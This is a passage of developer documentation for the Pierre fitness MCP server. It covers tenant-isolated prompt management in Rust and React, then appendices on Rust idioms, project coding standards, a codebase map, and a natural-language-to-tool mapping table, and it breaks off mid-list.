"prompts": [
"Do I need a rest day?",
"Analyze my sleep quality"
]
},
{
"key": "recipes",
"title": "Recipes",
"icon": "cooking",
"pillar": "nutrition",
"prompts": [
"Create a high-protein post-workout meal",
"Show my saved recipes"
]
}
]
API Endpoints
Public Endpoints
| Method | Endpoint | Description |
|---|---|---|
| GET | /api/prompts/suggestions | Get active prompt categories and welcome message |
Response:
{
"categories": [
{
"category_key": "training",
"category_title": "Training",
"category_icon": "runner",
"pillar": "activity",
"prompts": ["Am I ready for a hard workout today?"]
}
],
"welcome_prompt": "Welcome to Pierre! I'm your fitness AI assistant.",
"metadata": {
"timestamp": "2025-01-07T12:00:00Z",
"api_version": "1.0"
}
}
Admin Endpoints
All admin endpoints require the admin or super_admin role.
| Method | Endpoint | Description |
|---|---|---|
| GET | /api/admin/prompts | List all categories (including inactive) |
| POST | /api/admin/prompts | Create new category |
| GET | /api/admin/prompts/:id | Get specific category |
| PUT | /api/admin/prompts/:id | Update category |
| DELETE | /api/admin/prompts/:id | Delete category |
| GET | /api/admin/prompts/welcome | Get welcome prompt |
| PUT | /api/admin/prompts/welcome | Update welcome prompt |
| GET | /api/admin/prompts/system | Get system prompt |
| PUT | /api/admin/prompts/system | Update system prompt |
| POST | /api/admin/prompts/reset | Reset to defaults |
Create Category Request
{
"category_key": "strength",
"category_title": "Strength Training",
"category_icon": "dumbbell",
"pillar": "activity",
"prompts": [
"What's my estimated 1RM for bench press?",
"Create a strength training plan"
],
"display_order": 5
}
Update Category Request
{
"category_title": "Strength & Power",
"prompts": [
"What's my estimated 1RM?",
"Create a power building program"
],
"is_active": true
}
PromptManager Implementation
Source: src/database/prompts.rs
The PromptManager handles all database operations with tenant isolation:
#![allow(unused)]
fn main() {
pub struct PromptManager {
pool: SqlitePool,
}
impl PromptManager {
pub fn new(pool: SqlitePool) -> Self {
Self { pool }
}
/// Get active prompt categories for a tenant
pub async fn get_prompt_suggestions(
&self,
tenant_id: &str,
) -> AppResult<Vec<PromptCategory>> {
let rows = sqlx::query(
r#"
SELECT id, tenant_id, category_key, category_title,
category_icon, pillar, prompts, display_order, is_active,
created_at, updated_at
FROM prompt_suggestions
WHERE tenant_id = ? AND is_active = 1
ORDER BY display_order ASC, category_title ASC
"#,
)
.bind(tenant_id)
.fetch_all(&self.pool)
.await?;
rows.into_iter().map(Self::row_to_category).collect()
}
/// Create a new prompt category
pub async fn create_prompt_category(
&self,
tenant_id: &str,
request: &CreatePromptCategoryRequest,
) -> AppResult<PromptCategory> {
let id = Uuid::new_v4();
let now = Utc::now().to_rfc3339();
let prompts_json = serde_json::to_string(&request.prompts)?;
sqlx::query(
r#"
INSERT INTO prompt_suggestions
(id, tenant_id, category_key, category_title, category_icon,
pillar, prompts, display_order, is_active, created_at, updated_at)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, 1, ?, ?)
"#,
)
.bind(id.to_string())
.bind(tenant_id)
.bind(&request.category_key)
.bind(&request.category_title)
.bind(&request.category_icon)
.bind(request.pillar.as_str())
.bind(&prompts_json)
.bind(request.display_order.unwrap_or(0))
.bind(&now)
.bind(&now)
.execute(&self.pool)
.await?;
self.get_prompt_category(tenant_id, &id.to_string()).await
}
/// Reset prompts to defaults from JSON file
pub async fn reset_to_defaults(&self, tenant_id: &str) -> AppResult<()> {
// Delete existing categories
sqlx::query("DELETE FROM prompt_suggestions WHERE tenant_id = ?")
.bind(tenant_id)
.execute(&self.pool)
.await?;
// Load defaults from embedded JSON
let defaults: Vec<DefaultCategory> =
serde_json::from_str(include_str!("../llm/prompts/prompt_categories.json"))?;
// Insert default categories
for (order, cat) in defaults.into_iter().enumerate() {
let request = CreatePromptCategoryRequest {
category_key: cat.key,
category_title: cat.title,
category_icon: cat.icon,
pillar: Pillar::from_str(&cat.pillar)?,
prompts: cat.prompts,
display_order: Some(order as i32),
};
self.create_prompt_category(tenant_id, &request).await?;
}
// Reset welcome and system prompts
self.update_welcome_prompt(
tenant_id,
include_str!("../llm/prompts/welcome_prompt.md"),
).await?;
self.update_system_prompt(
tenant_id,
include_str!("../llm/prompts/pierre_system.md"),
).await?;
Ok(())
}
}
}
Tenant Isolation
Every prompt operation enforces tenant isolation:
- Query filtering: All SELECT queries include
WHERE tenant_id = ? - Ownership validation: Updates/deletes verify the category belongs to the tenant
- Unique constraints:
UNIQUE(tenant_id, category_key)prevents duplicate keys - Foreign key cascade:
ON DELETE CASCADEcleans up when tenant is deleted
#![allow(unused)]
fn main() {
/// Ensure the category belongs to the requesting tenant
async fn validate_category_ownership(
&self,
tenant_id: &str,
category_id: &str,
) -> AppResult<PromptCategory> {
let category = self.get_prompt_category_by_id(category_id).await?;
if category.tenant_id != tenant_id {
return Err(AppError::new(
ErrorCode::PermissionDenied,
"Category does not belong to this tenant",
));
}
Ok(category)
}
}
Frontend Admin UI
Source: frontend/src/components/PromptsAdminTab.tsx
The admin UI provides three sub-tabs:
Categories Tab
- Lists all prompt categories with pillar-colored badges
- Create, edit, and delete categories
- Drag-and-drop reordering (via
display_order) - Toggle category active/inactive state
Welcome Tab
- Edit the welcome message shown to new users
- Real-time preview with markdown rendering
- Character count indicator
System Tab
- Edit the LLM system prompt (markdown format)
- Customize AI assistant behavior and personality
- Reset to default system prompt
Reset Functionality
const resetMutation = useMutation({
mutationFn: () => apiService.resetPromptsToDefaults(),
onSuccess: () => {
// Invalidate all prompt-related queries
queryClient.invalidateQueries({ queryKey: ['admin-prompt-categories'] });
queryClient.invalidateQueries({ queryKey: ['admin-welcome-prompt'] });
queryClient.invalidateQueries({ queryKey: ['admin-system-prompt'] });
queryClient.invalidateQueries({ queryKey: ['prompt-suggestions'] });
},
});
Integration with Chat Interface
The chat interface fetches suggestions via the public endpoint:
Source: frontend/src/components/PromptSuggestions.tsx
const { data: suggestions } = useQuery({
queryKey: ['prompt-suggestions'],
queryFn: () => apiService.getPromptSuggestions(),
});
// Display categories grouped by pillar
const categoriesByPillar = useMemo(() => {
return suggestions?.categories.reduce((acc, cat) => {
const pillar = cat.pillar as Pillar;
if (!acc[pillar]) acc[pillar] = [];
acc[pillar].push(cat);
return acc;
}, {} as Record<Pillar, PromptCategory[]>);
}, [suggestions]);
Best Practices
1. Category Keys
Use descriptive, lowercase keys that won’t change:
- Good:
training,nutrition,recovery,recipes - Bad:
cat1,new_category,temp
2. Prompt Writing
Write prompts as questions users would naturally ask:
- Good: “Am I ready for a hard workout today?”
- Bad: “Get workout readiness”
3. Pillar Assignment
Match pillars to the primary domain:
- Activity: Training, performance, workouts
- Nutrition: Diet, calories, recipes, hydration
- Recovery: Sleep, rest days, stress, HRV
4. Display Order
Use meaningful ordering:
0-9: Primary/featured categories10-19: Secondary categories20+: Specialized/advanced categories
Testing
Source: frontend/e2e/prompts.spec.ts
The prompt system includes 17 Playwright E2E tests:
test.describe('Prompts Admin', () => {
test('can view prompt categories', async ({ page }) => {
await page.goto('/');
await page.click('[data-testid="prompts-tab"]');
await expect(page.locator('[data-testid="category-card"]'))
.toHaveCount.greaterThan(0);
});
test('can create new category', async ({ page }) => {
await page.click('[data-testid="create-category-btn"]');
await page.fill('[data-testid="category-key"]', 'test-category');
await page.fill('[data-testid="category-title"]', 'Test Category');
await page.selectOption('[data-testid="pillar-select"]', 'activity');
await page.click('[data-testid="save-category-btn"]');
await expect(page.locator('text=Test Category')).toBeVisible();
});
test('can reset to defaults', async ({ page }) => {
await page.click('[data-testid="reset-defaults-btn"]');
await page.click('[data-testid="confirm-reset-btn"]');
await expect(page.locator('text=Training')).toBeVisible();
});
});
Key Takeaways
-
Three prompt types: Categories (suggestions), Welcome (first-time), System (LLM instructions)
-
Tenant isolation: Each tenant has independent prompt configurations
-
Pillar classification: Visual organization into Activity, Nutrition, Recovery
-
Admin-only management: CRUD operations require admin role
-
Reset to defaults: One-click restore from embedded JSON/markdown files
-
Real-time updates: React Query invalidation ensures UI stays current
-
Markdown support: System prompts support full markdown formatting
-
Default prompts: New tenants get pre-configured defaults automatically
Related Chapters:
- Chapter 7: Multi-Tenant Isolation (tenant security)
- Chapter 33: Frontend Development (admin tabs)
- Chapter 26: LLM Providers (system prompt usage)
Appendix A: Rust Idioms Reference
Quick reference for Rust idioms used throughout Pierre.
Error Handling
? operator: Propagate errors up the call stack.
#![allow(unused)]
fn main() {
let data = fetch_data()?; // Returns early if error
}
thiserror: Derive Error trait with formatted messages.
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
#[error("Database error: {0}")]
pub struct DbError(String);
}
Structured Error Types (REQUIRED)
CRITICAL: Pierre prohibits anyhow::anyhow!() macro in all production code. All errors MUST use structured error types.
Correct patterns:
#![allow(unused)]
fn main() {
// GOOD: Using structured error types
return Err(AppError::not_found(format!("User {user_id}")));
return Err(DatabaseError::ConnectionFailed { source: e.to_string() }.into());
// GOOD: Mapping external errors to structured types
external_lib_call().map_err(|e| AppError::internal(format!("API failed: {e}")))?;
// GOOD: Adding context to structured errors
database_operation().context("Failed to fetch user profile")?;
}
Prohibited patterns (ZERO TOLERANCE):
#![allow(unused)]
fn main() {
// ❌ FORBIDDEN: Using anyhow::anyhow!()
return Err(anyhow::anyhow!("User not found"));
// ❌ FORBIDDEN: In map_err closures
.map_err(|e| anyhow!("Failed: {e}"))?;
// ❌ FORBIDDEN: In ok_or_else
.ok_or_else(|| anyhow!("Not found"))?;
}
Why structured errors?
- Enable type-safe error handling and proper HTTP status code mapping
- Support better error messages, logging, and debugging
- Make error handling testable and maintainable
Option and Result Patterns
Option::is_some_and: Check Some and condition in one call.
#![allow(unused)]
fn main() {
token.expires_at.is_some_and(|exp| exp > Utc::now())
}
Result::map_or: Transform result or use default.
#![allow(unused)]
fn main() {
result.map_or(0, |val| val.len())
}
Ownership and Borrowing
Arc<T>: Shared ownership across threads.
#![allow(unused)]
fn main() {
let database = Arc::new(Database::new());
let db_clone = database.clone(); // Cheap reference count increment
}
Box<dyn Trait>: Heap-allocated trait objects.
#![allow(unused)]
fn main() {
let provider: Box<dyn FitnessProvider> = Box::new(StravaProvider::new());
}
Async Patterns
async_trait: Async methods in traits.
#![allow(unused)]
fn main() {
#[async_trait]
trait Provider {
async fn get_data(&self) -> Result<Data>;
}
}
HRTB for Deserialize: Higher-ranked trait bound.
#![allow(unused)]
fn main() {
where
T: for<'de> Deserialize<'de>,
}
Type Safety Patterns
Enum for algorithm selection:
#![allow(unused)]
fn main() {
enum Algorithm {
Method1 { param: u32 },
Method2,
}
}
#[must_use]: Compiler warning if return value ignored.
#![allow(unused)]
fn main() {
#[must_use]
pub fn calculate(&self) -> f64 { ... }
}
Memory Management
zeroize: Secure memory cleanup for secrets.
#![allow(unused)]
fn main() {
use zeroize::Zeroize;
secret.zeroize(); // Overwrite with zeros
}
LazyLock: Thread-safe lazy static initialization (Rust 1.80+, preferred).
#![allow(unused)]
fn main() {
use std::sync::LazyLock;
// Initialization function runs once on first access
static CONFIG: LazyLock<Config> = LazyLock::new(|| Config::load());
// Usage - always initialized
let cfg = &*CONFIG; // Deref to get &Config
}
OnceLock: Thread-safe one-time initialization with runtime values.
#![allow(unused)]
fn main() {
use std::sync::OnceLock;
// When you need to set the value dynamically at runtime
static RUNTIME_CONFIG: OnceLock<Config> = OnceLock::new();
fn initialize(config: Config) {
RUNTIME_CONFIG.get_or_init(|| config);
}
}
When to use which:
LazyLock: Initialization is known at compile time (replaceslazy_static!)OnceLock: Initialization depends on runtime values or must be deferred
Memory Allocation Guidance
When to Use Each Smart Pointer
| Type | Heap? | Thread-Safe? | Use Case |
|---|---|---|---|
T (owned) | No | N/A | Small, short-lived values |
Box<T> | Yes | No | Large values, recursive types |
Rc<T> | Yes | No | Single-thread shared ownership |
Arc<T> | Yes | Yes | Multi-thread shared ownership |
Cow<'a, T> | Maybe | No | Clone-on-write optimization |
Stack vs Heap Guidelines
Prefer stack allocation:
#![allow(unused)]
fn main() {
// GOOD: Small structs on stack
let point = Point { x: 1.0, y: 2.0 }; // 16 bytes on stack
// GOOD: Arrays of known size
let buffer: [u8; 1024] = [0; 1024]; // 1KB on stack
}
Use heap for:
#![allow(unused)]
fn main() {
// Large data - avoid stack overflow
let large: Box<[u8; 1_000_000]> = Box::new([0; 1_000_000]);
// Dynamic size
let activities: Vec<Activity> = fetch_activities().await?;
// Trait objects (unknown size at compile time)
let provider: Box<dyn FitnessProvider> = get_provider();
// Recursive types
enum LinkedList {
Node(i32, Box<LinkedList>),
Nil,
}
}
Avoiding Unnecessary Allocations
Use slices instead of vectors:
#![allow(unused)]
fn main() {
// BAD: Allocates new Vec
fn process(data: Vec<u8>) { ... }
// GOOD: Borrows existing data
fn process(data: &[u8]) { ... }
}
Use &str for string parameters:
#![allow(unused)]
fn main() {
// BAD: Requires allocation or move
fn greet(name: String) { ... }
// GOOD: Accepts &str, &String, or String
fn greet(name: &str) { ... }
// BEST: Generic, accepts anything string-like
fn greet(name: impl AsRef<str>) { ... }
}
Clone-on-write for conditional ownership:
#![allow(unused)]
fn main() {
use std::borrow::Cow;
fn process_name(name: Cow<'_, str>) -> Cow<'_, str> {
if name.contains(' ') {
// Only allocates if modification needed
Cow::Owned(name.replace(' ', "_"))
} else {
name // No allocation
}
}
}
Activity Stream Processing
For large data streams (GPS, power, heart rate):
#![allow(unused)]
fn main() {
// BAD: Loads entire stream into memory
let stream: Vec<f64> = activity.power_stream.clone();
let np = calculate_np(&stream);
// GOOD: Process in chunks with iterator
fn calculate_np_streaming<I>(stream: I, window: usize) -> f64
where
I: Iterator<Item = f64>,
{
// Uses fixed-size window buffer, O(window) space
let mut window_buf = VecDeque::with_capacity(window);
// ... process
}
}
Reducing Clone Usage
#![allow(unused)]
fn main() {
// BAD: Unnecessary clone
let name = user.name.clone();
println!("{}", name);
// GOOD: Borrow instead
println!("{}", &user.name);
// When clone is necessary, document why
let name = user.name.clone(); // Needed: ownership moves to async task
tokio::spawn(async move {
process(name).await;
});
}
Arc vs Clone for Shared State
#![allow(unused)]
fn main() {
// GOOD: Arc cloning is cheap (atomic counter increment)
let db = Arc::new(Database::new());
let db_clone = db.clone(); // ~2 CPU instructions
// BAD: Cloning large data
let activities = expensive_query().await?;
let activities_clone = activities.clone(); // Allocates!
// GOOD: Share via Arc if needed in multiple places
let activities = Arc::new(expensive_query().await?);
let activities_ref = activities.clone(); // Cheap
}
Key Takeaways
- Error propagation: Use
?operator for clean error handling. - Structured errors:
anyhow!()is forbidden in production code. UseAppError,DatabaseError,ProviderErrorenums. - Trait objects:
Arc<dyn Trait>for shared polymorphism. - Async traits:
#[async_trait]macro enables async methods in traits. - Type safety: Enums and
#[must_use]prevent common mistakes. - Secure memory:
zeroizecrate for cryptographic key cleanup. - Lazy statics: Use
std::sync::LazyLock(Rust 1.80+) for compile-time-known lazy initialization,OnceLockfor runtime values.
Appendix B: CLAUDE.md Compliance Reference
Comprehensive reference for Pierre codebase standards from .claude/CLAUDE.md.
Error Handling (Zero Tolerance)
Structured Error Types (REQUIRED)
All errors MUST use project-specific error enums:
#![allow(unused)]
fn main() {
// ✅ GOOD: Structured error types
return Err(AppError::not_found(format!("User {user_id}")));
return Err(DatabaseError::ConnectionFailed { source: e.to_string() }.into());
return Err(ProviderError::RateLimitExceeded {
provider: "Strava".to_string(),
retry_after_secs: 3600,
limit_type: "Daily quota".to_string(),
});
// ✅ GOOD: Mapping external errors
external_lib_call().map_err(|e| AppError::internal(format!("API failed: {e}")))?;
}
Prohibited Patterns (CI Failure)
#![allow(unused)]
fn main() {
// ❌ FORBIDDEN: anyhow::anyhow!()
return Err(anyhow::anyhow!("User not found"));
// ❌ FORBIDDEN: anyhow! macro shorthand
return Err(anyhow!("Invalid input"));
// ❌ FORBIDDEN: In map_err closures
.map_err(|e| anyhow!("Failed: {e}"))?;
// ❌ FORBIDDEN: In ok_or_else
.ok_or_else(|| anyhow!("Not found"))?;
}
unwrap() and expect() Rules
unwrap(): Only in tests, static data, or binarymain()expect(): Only for documenting invariants that should never fail:#![allow(unused)] fn main() { // ✅ OK: Static/compile-time data "127.0.0.1".parse().expect("valid IP literal") // ❌ FORBIDDEN: Runtime errors user_input.parse().expect("should be valid") // NO! }
Code Style Requirements
File Headers (REQUIRED)
All code files MUST start with ABOUTME comments:
#![allow(unused)]
fn main() {
// ABOUTME: Brief description of what this module does
// ABOUTME: Additional context about the module's responsibility
}
Import Style (Enforced by Clippy)
Use use imports at the top of the file. Avoid inline qualified paths:
#![allow(unused)]
fn main() {
// ✅ GOOD: Import at top of file
use crate::models::User;
use std::collections::HashMap;
fn example() {
let user = User::new();
let map = HashMap::new();
}
// ❌ BAD: Inline qualified paths
fn example() {
let user = crate::models::User::new(); // NO!
let map = std::collections::HashMap::new(); // NO!
}
}
Naming Conventions
- NEVER use
_prefix for unused variables (fix the unused variable properly) - NEVER name things
improved,new,enhanced- code naming should be evergreen - NEVER add placeholder,
dead_code, or mock code in production
Comments
- NEVER remove existing comments unless provably false
- Comments should be evergreen - avoid temporal references (“after refactor”, “recently changed”)
- Use
///for public API documentation - Use
//for inline implementation comments
Tiered Validation Approach
Tier 1: Quick Iteration (during development)
cargo fmt
cargo check --quiet
cargo test <test_name_pattern> -- --nocapture
Tier 2: Pre-Commit (before committing)
cargo fmt
./scripts/architectural-validation.sh
cargo clippy --all-targets -- -D warnings -D clippy::all -D clippy::pedantic -D clippy::nursery -W clippy::cognitive_complexity
cargo test <module_pattern> -- --nocapture
CRITICAL: Always use --all-targets with clippy. Without it, clippy misses lint errors in tests/, benches/, and binary crates.
Tier 3: Full Validation (before PR/merge)
./scripts/lint-and-test.sh
Full test suite takes ~13 minutes (647 tests). Only run for PRs/merges.
Memory and Performance
Clone Usage Guidelines
Document why each clone() is necessary:
#![allow(unused)]
fn main() {
// ✅ OK: Arc clone (cheap, self-documenting)
let db_clone = database.clone();
// ✅ OK: Documented clone
let name = user.name.clone(); // Needed: ownership moves to async task
tokio::spawn(async move {
process(name).await;
});
// ❌ BAD: Unnecessary clone
let name = user.name.clone();
println!("{}", name); // Should just use &user.name
}
Arc Usage
- Only use when actual shared ownership required across threads
- Document the sharing requirement in comments
- Prefer
&Treferences when data lifetime allows - Current count: ~107 Arc usages (appropriate for multi-tenant async architecture)
Lazy Statics
#![allow(unused)]
fn main() {
// ✅ GOOD: LazyLock for compile-time-known initialization (Rust 1.80+)
use std::sync::LazyLock;
static CONFIG: LazyLock<Config> = LazyLock::new(|| Config::load());
// ✅ GOOD: OnceLock for runtime values
use std::sync::OnceLock;
static RUNTIME_CONFIG: OnceLock<Config> = OnceLock::new();
}
Testing Requirements
Test Coverage Policy
NO EXCEPTIONS: All code must have:
- Unit tests
- Integration tests
- End-to-end tests
Only skip with explicit authorization: “I AUTHORIZE YOU TO SKIP WRITING TESTS THIS TIME”
Test Targeting
# By test name (partial match)
cargo test test_training_load
# By test file
cargo test --test intelligence_test
# By module path
cargo test intelligence::
Security Requirements
- Input validation: Validate all user inputs at boundaries
- SQL injection prevention: Use parameterized queries
- Secret management: Never hardcode secrets, use
zeroizefor crypto keys - No
allow(clippy::...)attributes except for type conversion casts
Module Organization
- Public API defined in
mod.rsvia re-exports - Use
pub(crate)for internal APIs - Group related functionality in modules
- Feature flags for conditional compilation (database backends)
Commit Protocol
- Run tiered validation (Tier 2 minimum)
- Create atomic commits with clear messages
- NEVER use
--no-verifyflag - NEVER amend commits already pushed to remote
Key Compliance Checks
| Check | Requirement |
|---|---|
anyhow!() macro | ❌ FORBIDDEN in production code |
unwrap() | Tests/static data/binary main only |
#[allow(clippy::...)] | Only for cast validations |
| ABOUTME comments | REQUIRED on all source files |
--all-targets | REQUIRED with clippy |
| Structured errors | REQUIRED via AppError, etc. |
Quick Checklist
- No
anyhow::anyhow!()in production code - No unwarranted
unwrap()orexpect() - ABOUTME comments at top of file
- Use imports, not inline qualified paths
- Document
clone()usage when not Arc - Run clippy with
--all-targets - Tests for all new functionality
Appendix C: Pierre Codebase Map
Quick reference for navigating the Pierre codebase.
Core Modules
- src/lib.rs: Module declarations (45 modules)
- src/bin/pierre-mcp-server.rs: Binary entry point (server startup)
- src/config/: Environment configuration
- src/errors.rs: Error types with
thiserror
Authentication & Security
- src/auth.rs: JWT authentication and validation
- src/key_management.rs: MEK/DEK two-tier key management
- src/admin/jwks.rs: JWKS manager for RSA keys
- src/crypto/keys.rs: Ed25519 key generation for A2A
- src/middleware/auth.rs: MCP authentication middleware
Dependency Injection
- src/context/: Focused context DI system
- server.rs: ServerContext composing all contexts
- auth.rs: AuthContext (auth_manager, JWT, JWKS)
- data.rs: DataContext (database, provider_registry)
- config.rs: ConfigContext (config, tenant OAuth)
- notification.rs: NotificationContext (websocket, OAuth notifications)
Database
- src/database_plugins/: Database abstraction layer
- factory.rs: Database trait and factory pattern
- sqlite.rs: SQLite implementation
- postgres.rs: PostgreSQL implementation
MCP Protocol
- src/jsonrpc/: JSON-RPC 2.0 foundation
- src/mcp/protocol.rs: MCP request handlers
- src/mcp/schema.rs: Tool schemas (47 tools)
- src/mcp/tool_handlers.rs: Tool execution logic
- src/mcp/transport_manager.rs: Transport layer coordination
OAuth & Providers
- src/oauth2_server/: OAuth 2.0 server (RFC 7591)
- src/oauth2_client/: OAuth 2.0 client for fitness providers
- src/providers/core.rs: FitnessProvider trait
- src/providers/strava.rs: Strava API integration
- src/providers/garmin_provider.rs: Garmin API integration
- src/providers/fitbit.rs: Fitbit API integration
- src/providers/whoop_provider.rs: WHOOP API integration
- src/providers/terra_provider.rs: Terra API integration (150+ wearables)
Intelligence Algorithms
- src/intelligence/algorithms/tss.rs: Training Stress Score
- src/intelligence/algorithms/training_load.rs: CTL/ATL/TSB
- src/intelligence/algorithms/vo2max.rs: VO2 max estimation
- src/intelligence/algorithms/ftp.rs: FTP detection
- src/intelligence/performance_analyzer.rs: Activity analysis
A2A Protocol
- src/a2a/protocol.rs: A2A message handling
- src/a2a/auth.rs: A2A authentication
- src/a2a/agent_card.rs: Capability discovery
- src/a2a/client.rs: A2A client implementation
- src/a2a_routes.rs: HTTP endpoints for A2A protocol
Output Formatters
- src/formatters/mod.rs: Output format abstraction layer
- OutputFormat: Enum for JSON (default) or TOON format selection
- format_output(): Serialize data to selected format
- TOON: Token-Oriented Object Notation (~40% token reduction for LLMs)
API Key Routes
- src/api_key_routes.rs: HTTP endpoints for API key management
- Trial key requests
- API key status and listing
- User self-service key operations
SDK (TypeScript)
- sdk/src/bridge.ts: SDK bridge (stdio ↔ HTTP)
- sdk/src/types.ts: Generated tool types (47 interfaces)
- sdk/src/secure-storage.ts: OS keychain integration
- sdk/src/cli.ts: CLI wrapper for MCP hosts
Frontend Admin Dashboard (React/TypeScript)
- frontend/src/App.tsx: Main application component
- frontend/src/services/api.ts: Axios API client with CSRF handling
- frontend/src/contexts/: React contexts
- AuthContext.tsx: Authentication state management
- WebSocketContext.ts: WebSocket connection context
- WebSocketProvider.tsx: Real-time updates provider
- frontend/src/hooks/: Custom React hooks
- useAuth.ts: Authentication hook
- useWebSocket.ts: WebSocket connection hook
- frontend/src/components/: UI components (20+)
- Dashboard.tsx: Main dashboard view
- UserManagement.tsx: User approval and management
- A2AManagement.tsx: Agent-to-Agent monitoring
- ApiKeyList.tsx: API key management
- UsageAnalytics.tsx: Request patterns and metrics
- RequestMonitor.tsx: Real-time request monitoring
- ToolUsageBreakdown.tsx: Tool usage visualization
Templates (OAuth HTML)
- templates/oauth_success.html: OAuth success page
- templates/oauth_error.html: OAuth error page
- templates/oauth_login.html: OAuth login page
- templates/pierre-logo.svg: Brand assets
Testing
- tests/helpers/synthetic_data.rs: Deterministic test data
- tests/helpers/synthetic_provider.rs: In-memory provider
- tests/integration/: Integration tests
- tests/e2e/: End-to-end tests
Scripts
See scripts/README.md for comprehensive documentation.
Key scripts by category:
Development
- scripts/dev-start.sh: Start development environment (backend + frontend)
- scripts/fresh-start.sh: Clean database reset
- scripts/setup-git-hooks.sh: Install pre-commit, commit-msg, pre-push hooks
Validation & Testing
- scripts/architectural-validation.sh: Custom pattern validation (anyhow!, DI, etc.)
- scripts/lint-and-test.sh: Full CI validation suite
- scripts/pre-push-tests.sh: Critical path tests (5-10 minutes)
- scripts/smoke-test.sh: Quick validation (2-3 minutes)
- scripts/category-test-runner.sh: Run tests by category (mcp, oauth, security)
SDK & Type Generation
- scripts/generate-sdk-types.js: Auto-generate TypeScript types from server schemas
Deployment
- scripts/deploy.sh: Docker Compose deployment (dev/prod)
Configuration
- scripts/validation-patterns.toml: Architectural validation rules
Key File Locations
| Feature | File Path |
|---|---|
| Tool registry | src/mcp/schema.rs:499 |
| JWT auth | src/auth.rs |
| OAuth server | src/oauth2_server/endpoints.rs |
| Provider trait | src/providers/core.rs:52 |
| TSS calculation | src/intelligence/algorithms/tss.rs |
| Synthetic data | tests/helpers/synthetic_data.rs |
| SDK bridge | sdk/src/bridge.ts |
| Frontend dashboard | frontend/src/components/Dashboard.tsx |
| OAuth templates | templates/oauth_success.html |
| Architectural validation | scripts/architectural-validation.sh |
| Full CI suite | scripts/lint-and-test.sh |
Key Takeaways
- Module organization: 45 modules in src/lib.rs.
- Database abstraction: Factory pattern with SQLite/PostgreSQL implementations.
- MCP protocol: JSON-RPC foundation + MCP-specific handlers.
- OAuth dual role: Server (for MCP clients) + client (for fitness providers).
- Intelligence: Algorithm modules in src/intelligence/algorithms/.
- Testing: Synthetic data for deterministic tests.
- SDK bridge: TypeScript SDK bridges MCP hosts to Pierre server (stdio ↔ HTTP).
- Admin dashboard: React/TypeScript frontend for server management.
- Templates: HTML templates for OAuth flows with brand styling.
- Scripts: Comprehensive tooling for validation, testing, and deployment.
Appendix D: Natural Language to Tool Mapping
Quick reference mapping natural language prompts to Pierre MCP tools.
Supported Providers
Pierre supports 6 fitness providers: strava, garmin, fitbit, whoop, terra, coros
All provider-specific tools accept any of these providers in the provider parameter.
Connection & Authentication
| User says… | Tool | Parameters |
|---|---|---|
| “Link my Strava account” | connect_provider | {"provider": "strava"} |
| “Connect my Garmin watch” | connect_provider | {"provider": "garmin"} |
| “Show my connections” | get_connection_status | None |
| “Disconnect from Fitbit” | disconnect_provider | {"provider": "fitbit"} |
Data Access
| User says… | Tool | Parameters |
|---|---|---|
| “Show my last 10 runs” | get_activities | {"provider": "strava", "limit": 10} |
| “Get my WHOOP workouts” | get_activities | {"provider": "whoop", "limit": 10} |
| “Get my Strava profile” | get_athlete | {"provider": "strava"} |
| “What are my year-to-date stats?” | get_stats | {"provider": "strava"} |
| “Show my Terra data” | get_activities | {"provider": "terra", "limit": 10} |
| “Analyze activity 12345” | get_activity_intelligence | {"activity_id": "12345", "provider": "garmin"} |
Performance Analysis
| User says… | Tool | Parameters |
|---|---|---|
| “Analyze my last workout” | analyze_activity | Activity data |
| “Am I getting faster?” | analyze_performance_trends | Historical activities |
| “Compare my last two rides” | compare_activities | Two activity IDs |
| “Find patterns in my training” | detect_patterns | Activities array |
| “What’s my current fitness level?” | calculate_fitness_score | Activities + user profile |
| “Predict my marathon time” | predict_performance | Current fitness + race details |
Goals
| User says… | Tool | Parameters |
|---|---|---|
| “Set a goal to run sub-20 5K” | set_goal | {"type": "5K", "target_time": "00:20:00"} |
| “How am I progressing?” | track_progress | Goal ID |
| “Suggest realistic goals” | suggest_goals | Current fitness level |
| “Can I run a 3-hour marathon?” | analyze_goal_feasibility | {"goal_type": "marathon", "target_time": "03:00:00"} |
Training Recommendations
| User says… | Tool | Parameters |
|---|---|---|
| “What should I work on?” | generate_recommendations | Performance analysis |
| “Am I overtraining?” | analyze_training_load | Recent activities |
| “Do I need a rest day?” | suggest_rest_day | Recovery metrics |
Nutrition
| User says… | Tool | Parameters |
|---|---|---|
| “How many calories should I eat?” | calculate_daily_nutrition | User profile + activity level |
| “Search for banana nutrition” | search_food | {"query": "banana"} |
| “Show food details for ID 123” | get_food_details | {"fdc_id": "123"} |
| “Analyze this meal” | analyze_meal_nutrition | Array of foods with portions |
| “When should I eat carbs?” | get_nutrient_timing | Training schedule |
Sleep & Recovery
| User says… | Tool | Parameters |
|---|---|---|
| “How was my sleep?” | analyze_sleep_quality | Sleep session data |
| “What’s my recovery score?” | calculate_recovery_score | Multi-factor recovery data |
| “Optimize my sleep schedule” | optimize_sleep_schedule | Sleep history |
| “Track my sleep trends” | track_sleep_trends | Sleep sessions over time |
Configuration
| User says… | Tool | Parameters |
|---|---|---|
| “Update my FTP to 250W” | update_user_configuration | {"ftp": 250} |
| “Calculate my heart rate zones” | calculate_personalized_zones | User profile |
| “Show my configuration” | get_user_configuration | None |
| “What configuration profiles exist?” | get_configuration_catalog | None |
| “Set my fitness config” | set_fitness_config | Config key + value |
| “Show my fitness settings” | get_fitness_config | Config key |
Recipe Management (“Combat des Chefs”)
Pierre includes a training-aware recipe management system that aligns meal planning with training phases.
| User says… | Tool | Parameters |
|---|---|---|
| “What macros should I target for lunch?” | get_recipe_constraints | {"meal_timing": "pre_training"} |
| “Validate this chicken recipe” | validate_recipe | Recipe with ingredients array |
| “Save this recipe to my collection” | save_recipe | Validated recipe data |
| “Show my saved recipes” | list_recipes | {"meal_timing": "post_training"} |
| “Get recipe details for ID 123” | get_recipe | {"recipe_id": "123"} |
| “Delete this recipe” | delete_recipe | {"recipe_id": "123"} |
| “Search for pasta recipes” | search_recipes | {"query": "pasta", "meal_timing": "pre_training"} |
Recipe Workflow Pattern:
1. get_recipe_constraints → Get macro targets for training phase
2. LLM generates recipe matching constraints
3. validate_recipe → Check nutrition against USDA database
4. save_recipe → Store validated recipe
5. list_recipes/search_recipes → Browse collection
Prompt Patterns
Pattern 1: Temporal queries
- “my last X…” →
limit: X, offset: 0 - “this week…” → Filter by
start_date >= week_start - “in the past month…” → Filter by date range
Pattern 2: Comparative queries
- “compare A and B” →
